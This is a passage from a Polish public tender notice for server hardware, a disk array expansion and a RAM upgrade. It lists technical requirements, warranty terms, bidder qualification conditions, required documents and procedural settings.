9a	Redundantne zasilacze hotplug o sprawności 94% (tzw klasa Platinum) o mocy maksymalnej minimum 800W.
9b	Redundantne wentylatory hotplug.
10	Zarządzanie i zarządzanie zdalne:
10a	Wbudowane diody informacyjne lub wyświetlacz informujące o stanie serwera.
10b	Zintegrowany z płytą główną serwera kontroler sprzętowy zdalnego zarządzania zgodny z IPMI 2.0.
10c	Niezależny od systemu operacyjnego, sprzętowy kontroler umożliwiający pełne zarządzanie, zdalny restart serwera.
10d	Dedykowana karta LAN 1 Gb/s  (dedykowane złącze RJ-45 z tyłu obudowy) do komunikacji wyłącznie z kontrolerem zdalnego zarządzania z możliwością przeniesienia tej komunikacji na inną kartę sieciową współdzieloną z systemem operacyjnym.
10e	Dostęp poprzez przeglądarkę Web (także SSL) oraz SSH.
10f	Zarządzanie mocą i jej zużyciem oraz monitoring zużycia energii.
10g	Zarządzanie alarmami (zdarzenia poprzez SNMP).
10h	Możliwość przejęcia konsoli tekstowej.
10i	Przekierowanie konsoli graficznej na poziomie sprzętowym oraz możliwość montowania zdalnych napędów i ich obrazów na poziomie sprzętowym (cyfrowy KVM).
10j	Sprzętowy monitoring serwera w tym stanu dysków twardych i kontrolera RAID (bez pośrednictwa agentów systemowych).
10k	Karta zarządzająca musi sprzętowo wspierać wirtualizację warstwy sieciowej serwera, bez wykorzystania zewnętrznego hardware - wirtualizacja MAC i WWN na wybranych kartach zainstalowanych w serwerze (co najmniej wsparcie dla technologii kart 10Gbit/s Ethernet i kart FC 8Gbit/s oferowanych przez producenta serwera).
10l	Oprogramowanie zarządzające i diagnostyczne wyprodukowane przez producenta serwera umożliwiające konfigurację kontrolera RAID, instalację systemów operacyjnych, zdalne zarządzanie, diagnostykę i przewidywanie awarii w oparciu o informacje dostarczane w ramach zintegrowanego w serwerze systemu umożliwiającego monitoring systemu i środowiska (m.in. temperatura, dyski, zasilacze, płyta główna, procesory, pamięć operacyjna itd.).
11	Wspierane OS:
11a		Microsoft Windows 2012/2012 R2,
	VMWare vSphere 5.5/6.0,
	Suse LES 11/12,
	RedHat EL 6/7.
12	Gwarancja:
12a	Minimum 36 miesięcy gwarancji (UWAGA! Kryterium oceny) producenta serwera 
w trybie onsite.
12b	Dostępność części zamiennych przez 5 lat od momentu zakupu serwera.
12c	Wymagana jest bezpłatna dostępność poprawek i aktualizacji BIOS/Firmware/sterowników dożywotnio dla oferowanego serwera  jeżeli funkcjonalność ta wymaga dodatkowego serwisu lub licencji producenta serwera takowa licencja musi być uwzględniona w konfiguracji.


Rozbudowa macierzy
Dwa dyski twarde 6TB (UWAGA! Kryterium oceny) NL-SAS dedykowane do posiadanej macierzy Fujitsu Eternus DX100 S3. Dyski muszą przejmować reżim serwisowy macierzy 
w której zostały zainstalowane. Gwarancja nie może być krótsza niż 1 rok.

Rozbudowa pamięci RAM serwera
Pamięć RAM o całkowitej pojemności 32 GB ECC Registered w maksymalnie czterech kościach do posiadanego serwera HP ProLiant DL 380 G7. Pamięć musi być kompatybilna 
z w/w serwerem. Gwarancja nie może być krótsza niż 36 miesięcy. (UWAGA! Kryterium oceny)

Wykonawca udzieli Zamawiającemu gwarancji na urządzenie objęte przedmiotem zamówienia na okres minimum : 
zgodnie z opisem przedmiotu zamówienia stanowiącym załącznik nr 2 do SIWZ
Niezależnie od uprawnień z tytułu gwarancji, Zamawiający może wykonywać uprawnienia z tytułu rękojmi na zasadach ogólnych z tym, że okres rękojmi jest równy okresowi gwarancji.
Zamawiający nie dopuszcza składania ofert częściowych. 
Dodatkowe informacje dotyczące zamówienia:
1)Zamawiający nie przewiduje zawarcia umowy ramowej.
2)Zamawiający nie przewiduje zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 ustawy.
3)Zamawiający nie dopuszcza możliwości składania ofert wariantowych.
4)Zamawiający nie przewiduje aukcji elektronicznej.
5)Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.
6)Zamawiający nie określa w opisie przedmiotu zamówienia wymagań określonych w art. 29 ust. 3 a ustawy.
7)Zamawiający nie przewiduje wymagań, o których mowa w art. 29 ust. 3b 
i art. 29 ust.4 Pzp.
8)Zamawiający żąda wskazania przez Wykonawcę części zamówienia, których wykonanie zamierza powierzyć podwykonawcom i podania przez Wykonawcę firm podwykonawców. Informację w tym zakresie należy umieścić na formularzu ofertowym (załącznik nr 1 do SIWZ). W przypadku braku wskazania w formularzu ofertowym części zamówienia, której wykonanie będzie powierzone podwykonawcom, przyjmuje się, że całość zamówienia zostanie zrealizowana siłami własnymi Wykonawcy. Zamawiający nie zastrzega obowiązku osobistego wykonania przez wykonawcę kluczowych części zamówienia.
<br /><br /><b>II.5) Główny kod CPV: </b>48820000-2<br /><b> Dodatkowe kody CPV:</b>48821000-9,
                30214000-2,
                30211000-1,
                30233141-1,
                30234100-9,
                30236110-6<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 30<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia 
nie wymaga posiadania specjalnych kompetencji lub uprawnień
<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca spełni powyższy warunek, jeżeli w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, należycie wykonał, co najmniej jedną dostawę infrastruktury informatycznej o wartości minimum: 50 000,00 złotych brutto każda (w ramach jednej dostawy) 
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, każdy z wyżej wymienionych warunków udziału w postępowaniu powinien spełniać co najmniej jeden lub wszyscy wykonawcy wspólnie.
Ocena spełniania warunków udziału w postępowaniu o zamówienie publiczne przeprowadzona będzie w oparciu o złożone przez wykonawców oświadczenia 
i dokumenty zgodnie z formułą spełnia  nie spełnia.
Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, 
w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych. 
Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, musi udowodnić zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając w tym celu pisemne 
(w formie oryginału) zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia.
Dla swojej skuteczności zobowiązanie musi być złożone przez osobę/y uprawnione do reprezentowania podmiotu trzeciego w powyższym zakresie. Zobowiązanie złożone przez osobę nieuprawnioną nie dowodzi udostępnienia zasobu przez podmiot trzeci.
Wartości pieniężne wskazane w dokumentach złożonych w celu wykazania przez Wykonawcę spełniania warunków udziału w postępowaniu, o którym mowa powyżej, podane w walutach obcych, Wykonawca przeliczy na złote polskie wg średniego kursu walut NBP z dnia opublikowania ogłoszenia o niniejszym postępowaniu w Biuletynie Zamówień Publicznych
</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  tak
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1.	Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzień złożenia następujących oświadczeń lub dokumentów potwierdzających brak podstaw do wykluczenia:	
1)	Oświadczenia wykonawcy o braku wydania wobec niego prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczaniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne albo  w przypadku wydania takiego wyroku lub decyzji administracyjnej  dokumentów potwierdzających dokonanie płatności tych należności wraz z ewentualnymi odsetkami lub grzywnami lub zawarcie wiążącego porozumienia w sprawie spłat tych należności (w formie oryginału)
2)	Oświadczenia Wykonawcy o braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się o zamówienie publiczne (w formie oryginału)
1.2. Oświadczenia Wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej; w przypadku przynależności do tej samej grupy kapitałowej, Wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu (w formie oryginału) UWAGA! Dokument składany jest przez Wykonawcę w terminie 3 dni od zamieszczenia na stronie internetowej Zamawiającego informacji z otwarcia ofert. 
2.	Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzień złożenia następujących oświadczeń lub dokumentów potwierdzających spełnianie warunków udziału w postępowaniu:
1)	Wykazu dostaw wykonanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane (wg załącznika nr 6  w formie oryginału), 
oraz załączeniem dowodów, czy zostały wykonane należycie, przy czym dowodami, 
o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były wykonywane (w formie oryginału lub kopii poświadczonej za zgodność z oryginałem). Jeżeli z uzasadnionych przyczyn 
o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie Wykonawcy (w formie oryginału).
3.	Zamawiający zażąda od Wykonawcy, który polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a ustawy pzp, przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w ust. 1 pkt 1-2.
4.	Jeżeli jest to niezbędne do zapewnienia odpowiedniego przebiegu postępowania 
o udzielenie zamówienia, Zamawiający może na każdym etapie postępowania wezwać Wykonawców do złożenia wszystkich lub niektórych oświadczeń lub dokumentów potwierdzających, że nie podlegają wykluczeniu, spełniają warunki udziału 
w postępowaniu, a jeżeli zachodzą uzasadnione podstawy do uznania, że złożone uprzednio oświadczenia lub dokumenty nie są już aktualne, do złożenia aktualnych oświadczeń lub dokumentów.
5.	Dokumenty składane przez podmioty zagraniczne:
1)	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w Rozdziale 7 pkt 3 SIWZ składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2)	 Jeżeli w kraju, w którym ma siedzibę lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentu, o którym mowa w punkcie poprzedzającym SIWZ zastępuje się go dokumentem zawierającym oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, 
lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy lub miejsce zamieszkania tej osoby.   
6.	Forma składanych dokumentów.

1)	Warunkiem uznania kopii za dokument jest umieszczenie na każdej stronie kopii oświadczenia za zgodność z oryginałem i złożenie podpisu osoby/osób uprawnionych do reprezentowania Wykonawcy w obrocie gospodarczym, zgodnie 
z aktem rejestracyjnym, wymaganiami ustawowymi oraz przepisami prawa. 
2)	Gdy przedstawiona kopia dokumentu będzie nieczytelna lub będzie budziła wątpliwość ,co do jej prawdziwości, Zamawiający może zażądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu.
3)	Dokumenty sporządzone w języku obcym należy złożyć wraz z tłumaczeniem 
na język polski.
4)	Oświadczenia, o których mowa w Rozporządzeniu Ministra Rozwoju z dnia 26 lipca 2016 roku w sprawie rodzajów dokumentów, jakich może żądać Zamawiający 
od Wykonawcy w postępowaniu o udzielenie zamówienia, dotyczące Wykonawcy 
i innych podmiotów, na których zdolnościach lub sytuacji polega Wykonawca na zasadach określonych w art. 22a ustawy pzp oraz dotyczące podwykonawców, składane są w oryginale. Natomiast dokumenty, o których mowa w rozporządzeniu inne niż oświadczenia składane są w oryginale lub kopii poświadczonej za zgodność z oryginałem.
Poświadczenia za zgodność z oryginałem dokonuje odpowiednio Wykonawca, podmiot, na którego zdolnościach lub sytuacji polega Wykonawca, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego albo podwykonawca, 
w zakresie dokumentów, które każdego z nich dotyczą
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />2.	Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzień złożenia następujących oświadczeń lub dokumentów potwierdzających spełnianie warunków udziału w postępowaniu:
1)	Wykazu dostaw wykonanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane (wg załącznika nr 6  w formie oryginału), 
oraz załączeniem dowodów, czy zostały wykonane należycie, przy czym dowodami, 
o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były wykonywane (w formie oryginału lub kopii poświadczonej za zgodność z oryginałem). Jeżeli z uzasadnionych przyczyn 
o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie Wykonawcy (w formie oryginału).
3.	Zamawiający zażąda od Wykonawcy, który polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a ustawy pzp, przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w ust. 1 pkt 1-2.
4.	Jeżeli jest to niezbędne do zapewnienia odpowiedniego przebiegu postępowania 
o udzielenie zamówienia, Zamawiający może na każdym etapie postępowania wezwać Wykonawców do złożenia wszystkich lub niektórych oświadczeń lub dokumentów potwierdzających, że nie podlegają wykluczeniu, spełniają warunki udziału 
w postępowaniu, a jeżeli zachodzą uzasadnione podstawy do uznania, że złożone uprzednio oświadczenia lub dokumenty nie są już aktualne, do złożenia aktualnych oświadczeń lub dokumentów.
5.	Dokumenty składane przez podmioty zagraniczne:
1)	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w Rozdziale 7 pkt 3 SIWZ składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2)	 Jeżeli w kraju, w którym ma siedzibę lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentu, o którym mowa w punkcie poprzedzającym SIWZ zastępuje się go dokumentem zawierającym oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, 
lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy lub miejsce zamieszkania tej osoby.   
6.	Forma składanych dokumentów.

1)	Warunkiem uznania kopii za dokument jest umieszczenie na każdej stronie kopii oświadczenia za zgodność z oryginałem i złożenie podpisu osoby/osób uprawnionych do reprezentowania Wykonawcy w obrocie gospodarczym, zgodnie 
z aktem rejestracyjnym, wymaganiami ustawowymi oraz przepisami prawa. 
2)	Gdy przedstawiona kopia dokumentu będzie nieczytelna lub będzie budziła wątpliwość ,co do jej prawdziwości, Zamawiający może zażądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu.
3)	Dokumenty sporządzone w języku obcym należy złożyć wraz z tłumaczeniem 
na język polski.
4)	Oświadczenia, o których mowa w Rozporządzeniu Ministra Rozwoju z dnia 26 lipca 2016 roku w sprawie rodzajów dokumentów, jakich może żądać Zamawiający 
od Wykonawcy w postępowaniu o udzielenie zamówienia, dotyczące Wykonawcy 
i innych podmiotów, na których zdolnościach lub sytuacji polega Wykonawca na zasadach określonych w art. 22a ustawy pzp oraz dotyczące podwykonawców, składane są w oryginale. Natomiast dokumenty, o których mowa w rozporządzeniu inne niż oświadczenia składane są w oryginale lub kopii poświadczonej za zgodność z oryginałem.
5)	Poświadczenia za zgodność z oryginałem dokonuje odpowiednio Wykonawca, podmiot, na którego zdolnościach lub sytuacji polega Wykonawca, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego albo podwykonawca, 
w zakresie dokumentów, które każdego z nich dotyczą
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">7.	WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIANIA WARUNKI UDZIAŁU W POSTĘPOWANIU:

W celu potwierdzenia, że Wykonawca nie podlega wykluczeniu na podstawie art. 24 ust. 1 ustawy pzp oraz spełnia warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 b ustawy należy przedłożyć:
1.	Aktualne na dzień składania ofert oświadczenie składane na podstawie art. 25a ust. 1 ustawy dotyczące przesłanek wykluczenia z postępowania według wzoru stanowiącego Załącznik nr 4 do SIWZ; Zamawiający wymaga oświadczenia w formie oryginału;
2.	Aktualne na dzień składania ofert oświadczenie składane na podstawie art. 25a ust. 1 ustawy dotyczące spełniania warunków udziału w postępowaniu według wzoru stanowiącego Załącznik nr 5 do SIWZ; Zamawiający wymaga oświadczenia w formie oryginału;
3.	Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy
Załączniki do SIWZ:
Załącznik nr 1  Wzór formularza oferty
Załącznik nr 2  Szczegółowy opis przedmiotu zamówienia 
Załącznik nr 3  Zestawienie wymaganych parametrów technicznych i użytkowych 
Załącznik nr 4  Wzór oświadczenia Wykonawcy dotyczące przesłanek wykluczenia z postępowania
Załącznik nr 5  Wzór oświadczenia Wykonawcy dotyczące spełniania warunków udziału 
w postępowaniu,
Załącznik nr 6  Wykaz dostaw
Załącznik nr 7  Wzór umowy 
Załącznik nr 8  Wzór oświadczenia Wykonawcy o przynależności lub braku przynależności do grupy kapitałowej, o której mowa w art.24 ust. 11 (zgodnie z Rozdziałem 13 pkt. 6)
(NALEŻY PRZEKAZAĆ ZAMAWIAJACEMU  W  CIĄGU  3 DNI OD DNIA PRZEKAZANIA INFORMACJI, O KTÓRYCH  MOWA  
W  ART.  86 UST. 5 USTAWY PZP)
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena oferty</td><td>60</td></tr><tr><td>Kryteria jakościowe</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
